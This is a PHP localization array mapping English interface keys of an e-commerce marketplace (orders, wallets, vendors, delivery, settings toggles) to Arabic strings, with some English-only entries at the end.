'total_balance' => 'التوازن الكلي', 'total_business_overview' => 'إجمالي نظرة عامة على الأعمال', 'total_collected_tax' => 'إجمالي الضريبة التي تم جمعها', 'total_coupon_discount' => 'إجمالي خصم القسيمة', 'total_delivery_charge' => 'إجمالي رسوم التوصيل', 'total_delivery_charge_earned' => 'إجمالي رسوم التوصيل المكتسبة', 'total_discount' => 'إجمالي الخصم', 'total_discounted_amount' => 'إجمالي المبلغ المخفض', 'total_earning' => 'مجموع الأرباح', 'total_earnings' => 'الأرباح الكلية', 'total_expense' => 'المصاريف الكلية', 'total_expense_amount' => 'إجمالي مبلغ النفقات', 'total_expense_transactions' => 'إجمالي معاملات النفقات', 'total_in_Wishlist' => 'المجموع في قائمة الأمنيات', 'total_loyalty_point' => 'مجموع الولاء', 'total_order' => 'من أجل الكاملة', 'total_order_amount' => 'إجمالي مبلغ الطلب', 'total_ordered_product_price' => 'إجمالي سعر المنتج المطلوب', 'total_orders' => 'إجمالي الطلبات', 'total_point' => 'النقطة الكلية', 'total_price' => 'السعر الكلي', 'total_price_for_this_product' => 'إجمالي سعر هذا المنتج', 'total_product' => 'إجمالي المنتج', 'total_product_amount' => 'إجمالي مبلغ المنتج', 'total_product_discount' => 'إجمالي خصم المنتج', 'total_products' => 'إجمالي المنتجات', 'total_refund_amount' => 'إجمالي مبلغ الاسترداد', 'total_refundable_amount' => 'إجمالي المبلغ القابل للاسترداد', 'total_sale_of' => 'إجمالي بيع', 'total_settled_amount' => 'إجمالي المبلغ المستقر', 'total_sold' => 'إجمالي بيع', 'total_tax' => 'مجموع الضريبة', 'total_tax_collected' => 'إجمالي الضرائب التي تم جمعها', 'total_tax_given' => 'إجمالي الضريبة المعطاة', 'total_transaction' => 'المعاملة الكلية', 'total_transactions' => 'إجمالي المعاملات', 'total_withdraw' => 'الانسحاب الكلي', 'totals' => 'المجاميع', 'totals_cost' => 'تكلفة الإجماليات', 'touch' => 'يلمس', 'track_ID' => 'رقم الحافلة', 'track_Order' => 'ترتيب المسار', 'track_Order_Result' => 'نتيجة ترتيب المسار', 'track_order' => 'ترتيب المسار', 'track_order_result' => 'نتيجة ترتيب المسار', 'track_your_order' => 'أتبع طلبك', 'tracking_id' => 'معرف التتبع', 'tracking_status' => 'حالة التتبع', 'transaction' => 'عملية', 'transaction id' => 'رقم المعاملة', 'transaction_Date' => 'تاريخ الصفقة', 'transaction_ID' => 'رقم المعاملة', 'transaction_Report' => 'تقرير المعاملات', 'transaction_date' => 'تاريخ الصفقة', 'transaction_history' => 'تاريخ المعاملة', 'transaction_id' => 'رقم المعاملة', 'transaction_report' => 'تقرير المعاملات', 'transaction_table' => 'جدول المعاملات', 'transaction_type' => 'نوع المعاملة', 'transactions' => 'المعاملات', 'transection_history' => 'تاريخ الانتقال', 'translate' => 'يترجم', 'translations' => 'الترجمات', 'true' => 'حقيقي', 'turn' => 'دور', 'turn off' => 'أطفأ', 'turn on' => 'شغله', 'turn_OFF' => 'أطفأ', 'turn_off' => 'أطفأ', 'turn_on' => 'شغله', 'twilio_sms' => 'Twilio SMS', 'twitter' => 'تويتر', 'twitter_API_Set_up_Instructions' => 'Twitter API إعداد التعليمات', 'type' => 'يكتب', 'type _your_message' => 'اكتب رسالتك', 'type_here' => 'أكتب هنا', 'type_your_message_here' => 'اكتب رسالتك هنا', 'type_your_message_here..' => 'اكتب رسالتك هنا..', 'type_your_subtitle_text' => 'اكتب نص العنوان الفرعي الخاص بك', 'type_your_title_text' => 'اكتب نص العنوان الخاص بك', 'unblock' => 'رفع الحظر', 'unit' => 'وحدة', 'unit_price' => 'سعر الوحدة', 'unit_price_($)' => 'سعر الوحدة ($)', 'unpaid' => 'غير مدفوع الأجر', 'upcoming_campaign' => 'الحملة القادمة', 'update' => 'تحديث', 'update_&_Publish' => 'التحديث والنشر', 'update_cart' => 'تحديث العربة', 'update_category_shipping_cost' => 'تحديث تكلفة الشحن فئة', 'update_discount' => 'خصم تحديث', 'update_information_to_continue' => 'تحديث المعلومات للمتابعة', 'update_option_is_disabled_for_demo' => 'يتم تعطيل خيار التحديث للعروض التجريبية', 'update_product' => 'تحديث المنتج', 'update_product_list' => 'تحديث قائمة المنتج', 'update_product_quantity' => 'تحديث كمية المنتج', 'update_quantity' => 'تحديث الكمية', 'update_successful' => 'تم التحديث بنجاح', 'update_tax' => 'تحديث الضريبة', 'update_third_party_delivery_info' => 'تحديث معلومات توصيل الطرف الثالث', 'update_this_Address' => 'قم بتحديث هذا العنوان', 'update_this_address' => 'قم بتحديث هذا العنوان', 'update_to_cart' => 'تحديث العربة', 'update_your_bank_info_first' => 'قم بتحديث معلوماتك المصرفية أولاً', 'updated successfully!' => 'تم التحديث بنجاح!', 'updated_file' => 'ملف محدث', 'updated_files' => 'الملفات المحدثة', 'updated_product_list' => 'قائمة المنتج المحدثة', 'updated_products' => 'المنتجات المحدثة', 'updated_successfully' => 'تم التحديث بنجاح', 'updated_successfully!' => 'تم التحديث بنجاح!', 'upload' => 'رفع', 'upload it in the form below and submit.' => 'قم بتحميله في النموذج أدناه وإرساله.', 'upload_&_update' => 'تحميل وتحديث', 'upload_Addons' => 'تحميل الإضافات', 'upload_Banner' => 'تحميل لافتة', 'upload_Icon' => 'أيقونة تحميل', 'upload_Picture_on_Delivery' => 'تحميل الصورة عند التسليم', 'upload_additional_image' => 'تحميل صورة إضافية', 'upload_additional_product_images' => 'تحميل صور المنتج الإضافية', 'upload_any_additional_images_for_this_product_from_here' => 'تحميل أي صور إضافية لهذا المنتج من هنا', 'upload_file' => 'رفع ملف', 'upload_image' => 'تحميل الصور', 'upload_it_in_the_form_below_and_submit.' => 'قم بتحميله في النموذج أدناه وإرساله.', 'upload_logo' => 'تحميل شعار', 'upload_max_filesize' => 'تحميل max filemize', 'upload_product_images' => 'تحميل صور المنتج', 'upload_the_digital_products_from_here' => 'تحميل المنتجات الرقمية من هنا', 'upload_the_updated_file' => 'تحميل الملف المحدث', 'upload_theme' => 'موضوع تحميل', 'upload_thumbnail' => 'تحميل الصورة المصغرة', 'upload_zip_file' => 'تحميل ملف zip', 'uploaded_file' => 'ملف تم تحميله', 'urgent' => 'عاجل', 'use_referral_code' => 'استخدم رمز الإحالة', 'use_the_code_to_change_your_password_on_our_secure_website.' => 'استخدم الرمز لتغيير كلمة المرور الخاصة بك على موقعنا الآمن.', 'used' => 'مستخدم', 'usename' => 'سينام', 'user' => 'مستخدم', 'user_Section' => 'قسم المستخدم', 'user_app_version_control' => 'التحكم في إصدار تطبيق المستخدم', 'user_can_place_order_without_login' => 'يمكن للمستخدم تقديم الطلب بدون تسجيل الدخول', 'user_cannot_place_order_without_login' => 'لا يمكن للمستخدم تقديم الطلب بدون تسجيل الدخول', 'user_limit' => 'حد المستخدم', 'user_management' => 'إدارةالمستخدم', 'user_section' => 'قسم المستخدم', 'username' => 'اسم المستخدم', 'vacation_End' => 'نهاية العطلة', 'vacation_Mode' => 'وضع العطلة', 'vacation_Note' => 'ملاحظة العطلة', 'vacation_Start' => 'بداية الإجازة', 'valid_OAuth_Redirect_URIs' => 'OAUTT صالح إعادة توجيه URIS', 'valid_till' => 'صالحة ل', 'value' => 'قيمة', 'value_is_grater _or_equal_to_180M' => 'القيمة مبشرة أو تساوي 180 مترًا', 'value_is_grater _or_equal_to_20M' => 'القيمة مبشرة أو تساوي 20 مترًا', 'value_is_grater _or_equal_to_20MB' => 'القيمة مبشرة أو تساوي 20 ميجابايت', 'value_is_grater_or_equal_to_200M' => 'القيمة مبشرة أو تساوي 200 متر', 'value_is_grater_or_equal_to_20M' => 'القيمة مبشرة أو تساوي 20 مترًا', 'value_is_grater_or_equal_to_20MB' => 'القيمة مبشرة أو تساوي 20 ميجابايت', 'variant' => 'البديل', 'variant Price' => 'سعر البديل', 'variant_Price' => 'سعر البديل', 'variation' => 'تفاوت', 'variation wise product test' => 'اختبار المنتج الحكيمة', 'variations' => 'الاختلافات', 'various product' => 'منتج مختلف', 'vat' => 'ضريبة القيمة المضافة', 'verification' => 'تَحَقّق', 'verification_code' => 'رمز التحقق', 'verification_done_successfully' => 'تحقق بنجاح', 'verification_successfully_completed' => 'التحقق من التحقق بنجاح', 'verify' => 'يؤكد', 'verify_information_to_continue' => 'تحقق من المعلومات للمتابعة', 'verify_status' => 'تحقق من الحالة', 'view' => 'منظر', 'view more' => 'عرض المزيد', 'view_Order_Details' => 'معاينة تفاصيل الطلب', 'view_all' => 'عرض الكل', 'view_all_cart_items' => 'عرض جميع عناصر العربة', 'view_all_hold_orders' => 'عرض جميع أوامر عقد', 'view_cart' => 'عرض العربة', 'view_less' => 'عرض أقل', 'view_live' => 'عرض مباشر', 'view_more' => 'عرض المزيد', 'view_website' => 'عرض موقع الويب', 'visit' => 'يزور', 'visit_Store' => 'قم بزيارة المعرض او المتجر', 'visit_again' => 'زورني مره اخرى', 'visit_shop' => 'زيارة متجر', 'visit_website' => 'زيارة الموقع', 'waiting_for_location' => 'في انتظار الموقع', 'walking customer' => 'عميل المشي', 'walking_customer' => 'عميل المشي', 'wallet' => 'محفظة', 'wallet transactions' => 'معاملات المحفظة', 'wallet_Amount' => 'كمية المحفظة', 'wallet_Bonus_Added_Successfully' => 'مكافأة المحفظة أضافت بنجاح', 'wallet_Bonus_Setup' => 'إعداد مكافأة المحفظة', 'wallet_Bonus_Table' => 'جدول مكافأة المحفظة', 'wallet_Payments' => 'مدفوعات المحفظة', 'wallet_amount' => 'كمية المحفظة', 'wallet_bonus' => 'مكافأة محفظة', 'wallet_bonus_edit' => 'محفظة مكافأة تحرير', 'wallet_bonus_is_only_applicable_when_a_customer_add_fund_to_wallet_via_outside_payment_gateway' => 'لا تنطبق مكافأة المحفظة إلا عند إضافة صندوق إضافة العميل إلى محفظة عبر بوابة الدفع الخارجية', 'wallet_bonus_setup' => 'إعداد مكافأة المحفظة', 'wallet_payment' => 'دفع محفظة', 'wallet_statistics' => 'إحصائيات المحفظة', 'want_to_Turn_OFF_' => 'تريد إيقاف تشغيل', 'want_to_Turn_OFF_Add_Fund_to_Wallet_option' => 'تريد إيقاف تشغيل صندوق إضافة إلى محفظة خيار', 'want_to_Turn_OFF_Billing_Address_in_Checkout' => 'تريد إيقاف تشغيل عنوان الفواتير في الخروج', 'want_to_Turn_OFF_Customer_Wallet' => 'تريد إيقاف تشغيل محفظة العملاء', 'want_to_Turn_OFF_Delivery_Available_Country' => 'تريد إيقاف تشغيل التسليم المتاح للبلد', 'want_to_Turn_OFF_Delivery_Available_Zip_Code_Area' => 'تريد إيقاف تشغيل التسليم المتاحة منطقة الرمز البريدي', 'want_to_Turn_OFF_Digital_Product' => 'تريد إيقاف تشغيل المنتج الرقمي', 'want_to_Turn_OFF_Free_Delivery' => 'تريد إيقاف التوصيل المجاني', 'want_to_Turn_OFF_Loyalty_Point' => 'تريد إيقاف تشغيل نقطة الولاء', 'want_to_Turn_OFF_Minimum_Order_Amount' => 'تريد إيقاف الحد الأدنى لمبلغ الطلب', 'want_to_Turn_OFF_Order_Delivery_Verification' => 'تريد إيقاف تشغيل التحقق من توصيل الطلب', 'want_to_Turn_OFF_POS_for_Seller' => 'تريد إيقاف تشغيل نقاط البيع للبائع', 'want_to_Turn_OFF_Product_Brand' => 'تريد إيقاف تشغيل العلامة التجارية للمنتج', 'want_to_Turn_OFF_Referral_And_Earning_option' => 'تريد إيقاف تشغيل خيار الإحالة والكسب', 'want_to_Turn_OFF_Refund_to_Wallet_option' => 'تريد إيقاف تشغيل استرداد الأموال إلى محفظة', 'want_to_Turn_OFF_Self_Registration' => 'تريد إيقاف التسجيل الذاتي', 'want_to_Turn_OFF_the_App_Store_button' => 'تريد إيقاف تشغيل زر متجر التطبيقات', 'want_to_Turn_OFF_the_Cash_On_Delivery_option' => 'تريد إيقاف تشغيل خيار التسليم النقد عند التسليم', 'want_to_Turn_OFF_the_Digital_Payment_option' => 'تريد إيقاف تشغيل خيار الدفع الرقمي', 'want_to_Turn_OFF_the_Email_Verification' => 'تريد إيقاف التحقق من البريد الإلكتروني', 'want_to_Turn_OFF_the_Google_Play_Store_button' => 'تريد إيقاف تشغيل زر متجر Google Play', 'want_to_Turn_OFF_the_Guest_Checkout_Mode' => 'تريد إيقاف تشغيل وضع الخروج الضيف', 'want_to_Turn_OFF_the_OTP_Verification' => 'تريد إيقاف التحقق من OTP', 'want_to_Turn_OFF_the_Offline_Payment_option' => 'تريد إيقاف تشغيل خيار الدفع في وضع عدم الاتصال', 'want_to_Turn_OFF_the_Set_Minimum_Order_Amount_option' => 'تريد إيقاف تشغيل خيار الحد الأدنى للمبلغ المحدد', 'want_to_Turn_OFF_the_Temporary_Close_option' => 'تريد إيقاف تشغيل خيار الإغلاق المؤقت', 'want_to_Turn_OFF_the_sendgrid_mail_config_option' => 'تريد إيقاف تشغيل خيار تكوين بريد SendGrid', 'want_to_Turn_OFF_the_smtp_mail_config_option' => 'تريد إيقاف تشغيل خيار تكوين بريد SMTP', 'want_to_Turn_ON_' => 'تريد التشغيل', 'want_to_Turn_ON_Add_Fund_to_Wallet_option' => 'تريد تشغيل صندوق إضافة إلى محفظة', 'want_to_Turn_ON_Billing_Address_in_Checkout' => 'تريد تشغيل عنوان الفواتير في الخروج', 'want_to_Turn_ON_Customer_Wallet' => 'تريد تشغيل محفظة العملاء', 'want_to_Turn_ON_Delivery_Available_Country' => 'تريد تشغيل البلد المتاح', 'want_to_Turn_ON_Delivery_Available_Zip_Code_Area' => 'تريد تشغيل منطقة الرمز البريدي المتاحة للتسليم', 'want_to_Turn_ON_Digital_Product' => 'تريد تشغيل المنتج الرقمي', 'want_to_Turn_ON_Free_Delivery' => 'تريد تشغيل التوصيل المجاني', 'want_to_Turn_ON_Loyalty_Point' => 'تريد تشغيل نقطة الولاء', 'want_to_Turn_ON_Minimum_Order_Amount' => 'تريد تشغيل مبلغ الحد الأدنى للطلب', 'want_to_Turn_ON_Order_Delivery_Verification' => 'تريد تشغيل التحقق من تسليم الطلب', 'want_to_Turn_ON_POS_for_Seller' => 'تريد تشغيل نقاط البيع للبائع', 'want_to_Turn_ON_Product_Brand' => 'تريد تشغيل العلامة التجارية للمنتج', 'want_to_Turn_ON_Referral_And_Earning_option' => 'تريد تشغيل خيار الإحالة والكسب', 'want_to_Turn_ON_Refund_to_Wallet_option' => 'تريد تشغيل خيار الاسترداد إلى محفظة', 'want_to_Turn_ON_Self_Registration' => 'تريد تشغيل التسجيل الذاتي', 'want_to_Turn_ON_the_App_Store_button' => 'تريد تشغيل زر متجر التطبيقات', 'want_to_Turn_ON_the_Cash_On_Delivery_option' => 'تريد تشغيل خيار الأموال عند التسليم', 'want_to_Turn_ON_the_Digital_Payment_option' => 'تريد تشغيل خيار الدفع الرقمي', 'want_to_Turn_ON_the_Email_Verification' => 'تريد تشغيل التحقق من البريد الإلكتروني', 'want_to_Turn_ON_the_Google_Play_Store_button' => 'تريد تشغيل زر متجر Google Play', 'want_to_Turn_ON_the_Guest_Checkout_Mode' => 'تريد تشغيل وضع الخروج الضيف', 'want_to_Turn_ON_the_OTP_Verification' => 'تريد تشغيل التحقق من OTP', 'want_to_Turn_ON_the_Offline_Payment_option' => 'تريد تشغيل خيار الدفع في وضع عدم الاتصال', 'want_to_Turn_ON_the_Set_Minimum_Order_Amount_option' => 'تريد تشغيل خيار الحد الأدنى للمبلغ المحدد', 'want_to_Turn_ON_the_Temporary_Close_option' => 'تريد تشغيل خيار الإغلاق المؤقت', 'want_to_Turn_ON_the_sendgrid_mail_configt_option' => 'تريد تشغيل خيار SendGrid Mail Configt', 'want_to_Turn_ON_the_smtp_mail_configt_option' => 'تريد تشغيل خيار Configt Mail SMTP', 'want_to_Turn_Off_' => 'تريد إيقاف تشغيل', 'want_to_Turn_Off_the_Cash_On_Delivery_option' => 'تريد إيقاف تشغيل خيار التسليم النقد عند التسليم', 'want_to_Turn_Off_the_Digital_Payment_option' => 'تريد إيقاف تشغيل خيار الدفع الرقمي', 'want_to_Turn_Off_the_Offline_Payment_option' => 'تريد إيقاف تشغيل خيار الدفع في وضع عدم الاتصال', 'want_to_Turn_On_' => 'تريد التشغيل', 'want_to_Turn_On_the_Cash_On_Delivery_option' => 'تريد تشغيل خيار الأموال عند التسليم', 'want_to_Turn_On_the_Digital_Payment_option' => 'تريد تشغيل خيار الدفع الرقمي', 'want_to_Turn_On_the_Offline_Payment_option' => 'تريد تشغيل خيار الدفع في وضع عدم الاتصال', 'want_to_add_this_product' => 'تريد إضافة هذا المنتج', 'want_to_cancel_this_order ' => 'تريد إلغاء هذا الطلب', 'want_to_change_status' => 'تريد تغيير الحالة', 'want_to_change_the_shipping_responsibility_to_Inhouse' => 'تريد تغيير مسؤولية الشحن إلى Inhouse', 'want_to_change_the_shipping_responsibility_to_Seller_Wise' => 'تريد تغيير مسؤولية الشحن إلى البائع الحكيمة', 'want_to_clear_all_cart ' => 'تريد مسح كل العربة', 'want_to_clear_all_compare_list ' => 'تريد مسح كل قائمة المقارنة', 'want_to_clear_all_wishlist ' => 'تريد مسح كل قائمة الأمنيات', 'want_to_delete_this_account' => 'تريد حذف هذا الحساب', 'want_to_delete_this_account ' => 'تريد حذف هذا الحساب', 'want_to_delete_this_address ' => 'تريد حذف هذا العنوان', 'want_to_delete_this_coupon ' => 'تريد حذف هذه القسيمة', 'want_to_delete_this_customer' => 'تريد حذف هذا العميل', 'want_to_delete_this_item' => 'تريد حذف هذا العنصر', 'want_to_delete_this_item ' => 'تريد حذف هذا العنصر', 'want_to_delete_this_method' => 'تريد حذف هذه الطريقة', 'want_to_make_default_method' => 'تريد أن تجعل الطريقة الافتراضية', 'want_to_remove_compare_list_product ' => 'تريد إزالة منتج قائمة المقارنة', 'want_to_turn_OFF_msg91_sms' => 'تريد إيقاف تشغيل msg91 sms', 'want_to_turn_OFF_nexmo_sms' => 'تريد إيقاف تشغيل SMS Nexmo', 'want_to_turn_OFF_releans' => 'تريد إيقاف تشغيل releans', 'want_to_turn_OFF_twilio_sms' => 'تريد إيقاف تشغيل Twilio SMS', 'want_to_turn_OFF_twofactor_sms' => 'تريد إيقاف تشغيل SMS Twofactor', 'want_to_turn_ON_msg91_sms' => 'تريد تشغيل MSG91 SMS', 'want_to_turn_ON_nexmo_sms' => 'تريد تشغيل Nexmo SMS', 'want_to_turn_ON_releans' => 'تريد تشغيل releans', 'want_to_turn_ON_twilio_sms' => 'تريد تشغيل Twilio SMS', 'want_to_turn_ON_twofactor_sms' => 'تريد تشغيل sms twofactor', 'want_to_unfollow_this_shop' => 'تريد إلغاء متابعة هذا المتجر', 'want_to_update_status' => 'تريد تحديث الحالة', 'want_tocancel_this_order ' => 'تريد tocancel هذا الطلب', 'warely' => 'بحرارة', 'warning' => 'تحذير', 'wc-327477' => 'WC-327477', 'wc-327478' => 'WC-327478', 'wc-327479' => 'WC-327479', 'we_are_sorry' => 'نحن اسفون', 'we_are_using_the_most_advanced_security_to_provide_you_the_best_experience_ever.' => 'نحن نستخدم الأمان الأكثر تقدماً لتزويدك بأفضل تجربة على الإطلاق.', 'we_will_email_you_a_temporary_code.' => 'سنقوم بالبريد الإلكتروني لك رمز مؤقت.', 'wearable' => 'يمكن ارتداؤها', 'web' => 'الويب', 'web_&_app_settings' => 'إعدادات الويب والتطبيق', 'web_admin' => 'مسؤول الويب', 'web_application' => 'تطبيق الويب', 'web_color_setup' => 'إعداد لون الويب', 'web_config' => 'تكوين الويب', 'web_fav_icon' => 'أيقونة الويب المفضلة', 'web_footer' => 'تذييل الويب', 'website' => 'موقع إلكتروني', 'website_Color' => 'لون الموقع', 'website_Favicon' => 'موقع Favicon', 'website_Footer_Logo' => 'شعار تذييل الموقع', 'website_Header_Logo' => 'شعار رأس الموقع', 'website_problem' => 'مشكلة الموقع', 'week' => 'أسبوع', 'welcome_back_to_seller_login' => 'مرحبًا بك مرة أخرى في تسجيل الدخول إلى البائع', 'welcome_message' => 'مرحبًا بالرسالة', 'welcome_to' => 'مرحبا بك في', 'welcome_to_dashboard' => 'مرحبا بكم في لوحة القيادة', 'welcome_to_your_dashboard' => 'مرحبا بكم في لوحة القيادة الخاصة بك', 'what_is_App_Version' => 'ما هو إصدار التطبيق', 'what_you_need' => 'ماذا تحتاج', 'whatsApp' => 'Whatsapp', 'whatsapp_information_update_successfully' => 'تحديث معلومات WhatsApp بنجاح', 'whatsapp_number' => 'رقم WhatsApp', 'whatsapp_phone_number' => 'رقم هاتف WhatsApp', 'when_a_deliveryman_arrives_for_delivery_they_must_provide_the_code_to_the_deliveryman_to_verify_the_order_delivery' => 'عند وصول أحد التسليم للتسليم ، يجب عليهم توفير الرمز إلى تسليم مان للتحقق من تسليم الطلب', 'when_converting_loyalty_points_to_currency_customers_will_require_the_minimum_loyalty_point_set_by_the_admin' => 'عند تحويل نقاط الولاء إلى عملاء العملات ، سيتطلب عملاء الحد الأدنى للولاء الذي حدده المسؤول', 'where_to_get_this_information ' => 'من أين تحصل على هذه المعلومات', 'which_will_be_shown_in_search_engine_results' => 'التي سيتم عرضها في نتائج محرك البحث', 'will be sent to your number provide that' => 'سيتم إرساله إلى رقمك توفير ذلك', 'wish' => 'يتمنى', 'wish_Listed_Products' => 'أمنيات المنتجات المدرجة', 'wish_list' => 'قائمة الرغبات', 'wish_listed' => 'أمنيات مدرجة', 'wishes' => 'التمنيات', 'wishlist' => 'قائمة الرغبات', 'wishlist_Removed' => 'قم بإزالة قائمة الأمنيات', 'wishlist_sort_by_(high_to_low)' => 'قائمة الأمنيات بواسطة (عالية إلى منخفضة)', 'wishlist_sort_by_(low_to_high)' => 'قائمة الأمنيات بواسطة (منخفضة إلى عالية)', 'wishlists' => 'قوائم الامنيات', 'withdraw' => 'ينسحب', 'withdraw requests' => 'سحب الطلبات', 'withdraw_Request' => 'طلب سحب', 'withdraw_Request_Table' => 'سحب جدول طلب', 'withdraw_able_balance' => 'سحب التوازن القادر', 'withdraw_method_list' => 'السحب قائمة طريقة', 'withdrawable_balance' => 'توازن قابل للسحب', 'withdrawal methods' => 'طرق الانسحاب', 'withdrawal_Methods' => 'طرق الانسحاب', 'withdrawble_Balance' => 'سحب التوازن', 'withdrawn' => 'انسحب', 'withdraws' => 'ينسحب', 'women s shoes' => 'أحذية المرأة', 'write_coupon_code_here' => 'اكتب رمز القسيمة هنا', 'write_something' => 'أكتب شيئا', 'write_your_message_here' => 'اكتب رسالتك هنا', 'yes' => 'نعم', 'yes_change_it' => 'نعم تغييره', 'yes_delete_it' => 'نعم حذفه', 'yes_i_Accept' => 'نعم أنا أقبل', 'you do not have sufficient balance for pay this order!!' => 'ليس لديك رصيد كاف لدفع هذا الطلب !!', 'you_Get_Free_Delivery_Bonus' => 'تحصل على مكافأة توصيل مجانية', 'you_are_already_login_proceed' => 'أنت بالفعل تسجيل الدخول', 'you_can_check_our' => 'يمكنك التحقق من', 'you_can_download_the_example_file_to_understand_how_the_data_must_be_filled.' => 'يمكنك تنزيل ملف المثال لفهم كيفية ملء البيانات.', 'you_can_get_brand_and_category_id_from_their_list_please_input_the_right_ids.' => 'يمكنك الحصول على معرف العلامة التجارية والفئة من قائمتهم ، يرجى إدخال المعرفات الصحيحة.', 'you_can_not_change_it' => 'لا يمكنك تغييره', 'you_can_refund_request_after_the_product_is_delivered!' => 'يمكنك استرداد الطلب بعد تسليم المنتج!', 'you_can_review_after_product_is_delivered!' => 'يمكنك المراجعة بعد تسليم المنتج!', 'you_can_review_after_the_product_is_delivered!' => 'يمكنك المراجعة بعد تسليم المنتج!', 'you_can_setup_theme_wise_required_data_from_there.' => 'يمكنك إعداد بيانات الحكمة المطلوبة من هناك.', 'you_can_upload_your_product_images_in_product_folder_from_gallery_and_copy_image_path.' => 'يمكنك تحميل صور المنتج في مجلد المنتج من المعرض ونسخ مسار الصورة.', 'you_can_use_this_ID_to_track_your_order_later' => 'يمكنك استخدام هذا المعرف لتتبع طلبك لاحقًا', 'you_cannot_add_product_to_cart_from_this_shop_for_now' => 'لا يمكنك إضافة منتج إلى عربة من هذا المتجر الآن', 'you_do_not_have_sufficient_balance_for_pay_this_order!!' => 'ليس لديك رصيد كاف لدفع هذا الطلب !!', 'you_have_new order' => 'لديك طلب جديد', 'you_have_new_order' => 'لديك طلب جديد', 'you_have_switched_theme_successfully' => 'لقد قمت بتبديل السمة بنجاح', 'you_have_to_input_all_the_banners_again_for_each_section' => 'يجب عليك إدخال جميع اللافتات مرة أخرى لكل قسم', 'you_made_your_earning' => 'لقد صنعت ربحك', 'you_may_also_like' => 'ربما يعجبك أيضا', 'you_order_has_been_confirmed_and_will_be_shipped_according_to_the_method_you_selected' => 'تم تأكيد الطلب وسيتم شحنه وفقًا للطريقة التي حددتها', 'you_setup_those_data_from_there.' => 'يمكنك إعداد هذه البيانات من هناك.', 'you_want_to_add_fund' => 'تريد إضافة صندوق', 'you_want_to_remove_all_items_from_cart' => 'تريد إزالة جميع العناصر من العربة', 'you_will not_be_able_to_revert_this' => 'لن تكون قادرًا على إعادة هذا', 'you_will_get_response' => 'سوف تحصل على الرد', 'you_will_lost_the_this_addon' => 'سوف تفقد هذا الملحق', 'you_will_lost_the_this_theme' => 'سوف تفقد هذا الموضوع', 'you_will_not_be able_to_revert_this' => 'لن تكون قادرًا على إعادة هذا', 'you_will_not_be_able_to_revert_this' => 'لن تكون قادرًا على إعادة هذا', 'you_will_receive_an_email_confirmation_when_your_order_is_completed' => 'سوف تتلقى تأكيد بريد إلكتروني عند اكتمال طلبك', 'you_will_receive_an_email_confirmation_when_your_order_is_completed.' => 'سوف تتلقى تأكيد بريد إلكتروني عند اكتمال طلبك.', 'you_wont_be_able_to_revert_this' => 'لن تتمكن من إعادة هذا', 'your' => 'لك', 'your loyalty point will convert to currency and transfer to your wallet' => 'سيتم تحويل نقطة الولاء الخاصة بك إلى العملة والتحويل إلى محفظتك', 'your_Email_Address' => 'عنوان بريدك الإلكتروني', 'your_Order_ID' => 'معرف طلبك', 'your_account_is_ready_to_use' => 'حسابك جاهز للاستخدام', 'your_address' => 'عنوانك', 'your_cart_is_empty' => 'عربة التسوق فارغة', 'your_current_balance' => 'توازنك الحالي', 'your_email' => 'بريدك الالكتروني', 'your_first_name' => 'اسمك الأول', 'your_loyalty_point_will_convert_to_currency_and_transfer_to_your_wallet' => 'سيتم تحويل نقطة الولاء الخاصة بك إلى العملة والتحويل إلى محفظتك', 'your_name' => 'اسمك', 'your_order_confirm' => 'تأكيد طلبك', 'your_order_has_been_placed_successfully' => 'تم تقديم طلبك بنجاح', 'your_order_has_been_placed_successfully!' => 'تم تقديم طلبك بنجاح!', 'your_order_is_completed' => 'تم الانتهاء من طلبك', 'your_order_placed_successfully' => 'طلب طلبك بنجاح', 'your_password_must_be_at_least_8_characters' => 'يجب أن تكون كلمة المرور الخاصة بك 8 أحرف على الأقل', 'your_personal_code' => 'رمزك الشخصي', 'your_phone' => 'هاتفك', 'your_phone_number' => 'رقم تليفونك', 'your_server_php' => 'الخادم الخاص بك php', 'your_shop_address' => 'عنوان متجرك', 'youtube_video_link' => 'رابط فيديو يوتيوب', 'z_a' => 'z أ', 'z_to_a_Order' => 'z لأمر', 'z_to_a_order' => 'z لطلب', 'zip' => 'أَزِيز', 'zip_Code' => 'الرمز البريدي', 'zip_code' => 'الرمز البريدي', 'zone' => 'منطقة', 'Secure_Payment' => 'Secure Payment', 'Don’t_have_account' => 'Don’t have account', 'Ex:_6+_character' => 'Ex: 6+ character', 'Ex:_8+_character' => 'Ex: 8+ character', 'see_less' => 'See less', 'please_fill_out_this_field' => 'Please fill out this field', 'Don’t_Miss_the_Chance' => 'Don’t Miss the Chance', 'Today’s_Best_Deal' => 'Today’s Best Deal', 'Ex_:_Shop_-12_Road-8' => 'Ex : Shop -12 Road-8', 'finish' => 'Finish', 'hurry_Up' => 'Hurry Up', 'the_offer_is_limited' => 'The offer is limited', 'grab_while_it_lasts' => 'Grab while it lasts', 'top_sellers' => 'Top sellers', 'my_Profile' => 'My Profile', 'you_have_saved' => 'You have saved', 'user_profile' => 'User profile', 'Product_has_been_removed_from_wishlist' => 'Product has been removed from wishlist', 'Okay' => 'Okay', 'Product_added_to_wishlist' => 'Product added to wishlist', 'Please_Login' => 'Please Login', 'You_need_to_login_to_view_this_feature' => 'You need to login to view this feature', 'Delete_this_address' => 'Delete this address', 'This_address_will_be_removed_from_this_list' => 'This address will be removed from this list', 'language_change_successfully' => 'Language change successfully', 'Environment_Settings' => 'Environment Settings', 'software_Update' => 'Software Update', 'site_Map' => 'Site Map', 'after_adding_a_new_language _you_need_to_translate_the_key_contents_for_users_to_experience_this_feature' => 'After adding a new language you need to translate the key contents for users to experience this feature', 'to_translate_a_language_click_the_action_button_from_the_language_table_&_click_translate' => 'To translate a language click the action button from the language table & click translate', 'then_change_the_key_language_value_manually_or_click_the_‘Auto_Translate’_button' => 'Then change the key language value manually or click the ‘Auto Translate’ button', 'Finally _click_‘Update’_to_save_the_changes' => 'Finally click ‘Update’ to save the changes', 'want_to_Turn_ON_Language_Status' => 'Want to Turn ON Language Status', 'want_to_Turn_OFF_Language_Status' => 'Want to Turn OFF Language Status', 'want_to_Change_Default_Language_Status' => 'Want to Change Default Language Status', 'image_description' => 'Image description', 'product_Attribute_Setup' => 'Product Attribute Setup', 'in-House_Products' => 'In-House Products', 'product_gallery' => 'Product gallery', 'vendor_Products' => 'Vendor Products', 'product_update_requests' => 'Product update requests', 'banner_Setup' => 'Banner Setup', 'send_notification_svg' => 'Send notification svg', 'push_notifications_setup' => 'Push notifications setup', 'push_notification_svg' => 'Push notification svg', 'Features_Section' => 'Features Section', 'vendor_Sales' => 'Vendor Sales', 'vendors' => 'Vendors', 'add_New_Vendor' => 'Add New Vendor', 'vendor_List' => 'Vendor List', 'delivery_men' => 'Delivery men', 